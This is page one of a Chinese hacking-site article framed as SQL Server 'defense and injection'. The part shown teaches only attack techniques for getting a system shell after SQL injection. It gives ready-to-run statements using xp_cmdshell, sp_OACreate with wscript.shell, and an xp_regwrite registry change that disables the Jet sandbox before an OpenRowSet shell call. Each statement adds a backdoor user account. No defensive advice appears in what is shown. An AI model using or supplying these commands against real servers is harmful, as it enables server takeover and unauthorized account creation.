SQL Server防御及注入

• 　　SQL Server是中小型网站广泛使用的数据库，由于功能强大也滋生了很多安全问题，国内又因为SQL注入攻击的很长一段时间流行，导致对SQL Server的入侵技巧也层出不穷，由于SQL Server支持多语句，相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法，而直接转向使用SQL Server的存储过程和函数快速的拿权限，下面我就围绕SQL Server的系统存储过程和函数来介绍这些黑客技巧。

  　　一、执行系统命令

  　　利用存储过程我们可以快速方便的获取一个shell,如执行系统命令，存储扩展调用如下：

  　　exec master..xp_cmdshell 'net user ray ray /add'

  　　xp_cmdshell是SQL Server自带的系统命令存储过程，默认情况下只有SYSADMIN服务器角色才能执行。

  　　

  　　利用OLE对象接口，SQL SERVER提供了一些函数访问OLE对象，分别是sp_OACREATE和sp_OAMethod,可以利用他们调用OLE控件，间接获取一个shell。使用SP_OAcreate调用对象wscript。shell赋给变量@shell，然后使用SP_OAMETHOD调用@shell的属性run执行命令。

  　　DECLARE @shell INT

  　　EXEC SP_OAcreate 'wscript.shell',@shell out

  　　EXEC SP_OAMETHOD @shell,'run',null, 'net user ray ray /add'

  　　

  　　开启access的沙盒模式,在默认情况下Jet数据引擎不支持select shell("net user ray ray /add")这样的SQL语句，但是开启了JET引擎的沙盒模式后就可以执行命令，先利用xp_regwrite存储过程改写注册表，然后利用OpenRowSet访问一个系统本身自带的一个ACCESS数据库文件，再执行运行命令的SQL语句。

  　　EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0 \Engines','SandBoxMode','REG_DWORD',0

  　　

  　　Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user ray ray /add")');

• [1] [2] [3] [4] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• SQL Server防御及注入 相关文章：
• ·节哀顺便病毒感染安全软件致防御失效
• ·怎么样清除能突破主动防御的新型木马
• ·谈谈跨站脚本攻击与防御技巧
• ·完全防御DDoS攻击的实时监测模型
• ·拒绝服务攻击防御全攻略
• ·SQL Server防御及注入
• ·瑞星杀毒2008主动防御的详细设置
• ·金山毒霸2008主推“三维网络防御体系”
• ·360度防御：诺顿360用户体验报告
• ·木马病毒绕过主动防御直接刺穿卡巴斯基
• SQL Server防御及注入 相关软件
• ·3D防御战2
• ·高皇帝御制文集
• ·防御之王
• ·领导通御指导手册
• ·Autorun病毒防御V2.0 Beta 2
• ·妖皇之煌——百妖御
• ·御魔尊者
• ·御美情缘
• ·御天者
• ·御月传说

上一篇:防止被杀毒软件误删的代码

下一篇:恢复被误删除的Linux文件

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐